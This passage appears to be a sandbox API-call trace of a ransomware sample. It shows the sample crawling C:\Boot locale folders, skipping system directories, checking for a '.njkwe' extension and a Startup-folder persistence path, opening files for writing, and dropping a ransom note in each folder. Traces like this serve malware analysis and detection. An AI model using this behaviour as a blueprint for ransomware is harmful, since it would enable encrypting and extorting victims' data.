[0065.015] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.015] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.015] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.015] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.015] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.015] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0065.015] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.015] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.015] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.015] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.015] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.016] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.016] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.016] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.016] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.016] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.016] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.016] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0065.016] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.016] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.016] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.016] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.016] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.016] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.016] FindClose (in: hFindFile=0xc1a220 | out: hFindFile=0xc1a220) returned 1 [0065.016] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.016] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\en-us\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.018] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.019] CloseHandle (hObject=0x428) returned 1 [0065.019] GetProcessHeap () returned 0xbe0000 [0065.019] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.019] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0065.020] lstrcmpiW (lpString1="es-ES", lpString2="Windows") returned -1 [0065.020] lstrcmpiW (lpString1="es-ES", lpString2="$Recycle.bin") returned 1 [0065.020] lstrcmpiW (lpString1="es-ES", lpString2="System Volume Information") returned -1 [0065.020] lstrcmpiW (lpString1="es-ES", lpString2="Program Files") returned -1 [0065.020] lstrcmpiW (lpString1="es-ES", lpString2="Program Files (x86)") returned -1 [0065.020] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0065.020] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0065.020] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0065.020] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\es-ES", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.020] GetProcessHeap () returned 0xbe0000 [0065.020] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.020] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0065.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0065.020] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.020] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.020] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.020] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.020] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.020] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0065.020] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.020] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.020] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.020] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.020] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.020] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.020] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.020] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0065.021] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.021] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.021] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.021] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.021] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.021] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.021] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.021] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.021] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0065.021] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.021] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.021] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.021] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.021] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.021] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.021] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.021] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.021] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.021] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.021] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.021] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui") returned 33 [0065.021] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.021] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.021] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.021] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.021] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.022] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.022] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0065.022] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.022] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\es-es\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.025] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.025] CloseHandle (hObject=0x428) returned 1 [0065.026] GetProcessHeap () returned 0xbe0000 [0065.026] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.026] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="es-MX", cAlternateFileName="")) returned 1 [0065.026] lstrcmpiW (lpString1="es-MX", lpString2="Windows") returned -1 [0065.026] lstrcmpiW (lpString1="es-MX", lpString2="$Recycle.bin") returned 1 [0065.026] lstrcmpiW (lpString1="es-MX", lpString2="System Volume Information") returned -1 [0065.026] lstrcmpiW (lpString1="es-MX", lpString2="Program Files") returned -1 [0065.026] lstrcmpiW (lpString1="es-MX", lpString2="Program Files (x86)") returned -1 [0065.026] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-MX") returned 17 [0065.026] lstrcmpW (lpString1="es-MX", lpString2=".") returned 1 [0065.026] lstrcmpW (lpString1="es-MX", lpString2="..") returned 1 [0065.026] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\es-MX", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.026] GetProcessHeap () returned 0xbe0000 [0065.026] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.026] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\*") returned 19 [0065.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-MX\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0065.026] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.026] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.026] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.026] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.026] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.026] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\.") returned 19 [0065.026] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.026] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.027] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.027] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.027] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.027] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.027] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.027] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\..") returned 20 [0065.027] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.027] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.027] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.027] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.027] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.027] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.027] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.027] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.027] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 33 [0065.027] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.027] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.027] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.027] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.027] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.027] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.027] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0065.027] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-MX\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.027] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-MX\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\es-mx\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.028] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.029] CloseHandle (hObject=0x428) returned 1 [0065.029] GetProcessHeap () returned 0xbe0000 [0065.029] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.029] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="et-EE", cAlternateFileName="")) returned 1 [0065.029] lstrcmpiW (lpString1="et-EE", lpString2="Windows") returned -1 [0065.029] lstrcmpiW (lpString1="et-EE", lpString2="$Recycle.bin") returned 1 [0065.029] lstrcmpiW (lpString1="et-EE", lpString2="System Volume Information") returned -1 [0065.029] lstrcmpiW (lpString1="et-EE", lpString2="Program Files") returned -1 [0065.029] lstrcmpiW (lpString1="et-EE", lpString2="Program Files (x86)") returned -1 [0065.029] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\et-EE") returned 17 [0065.029] lstrcmpW (lpString1="et-EE", lpString2=".") returned 1 [0065.029] lstrcmpW (lpString1="et-EE", lpString2="..") returned 1 [0065.029] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\et-EE", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.029] GetProcessHeap () returned 0xbe0000 [0065.029] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.030] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\*") returned 19 [0065.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\et-EE\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a360 [0065.030] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.030] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.030] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.030] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.030] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.030] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\.") returned 19 [0065.030] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.030] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.030] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.030] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.030] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.030] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.030] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.030] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\et-EE\\..") returned 20 [0065.030] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.030] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.030] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, 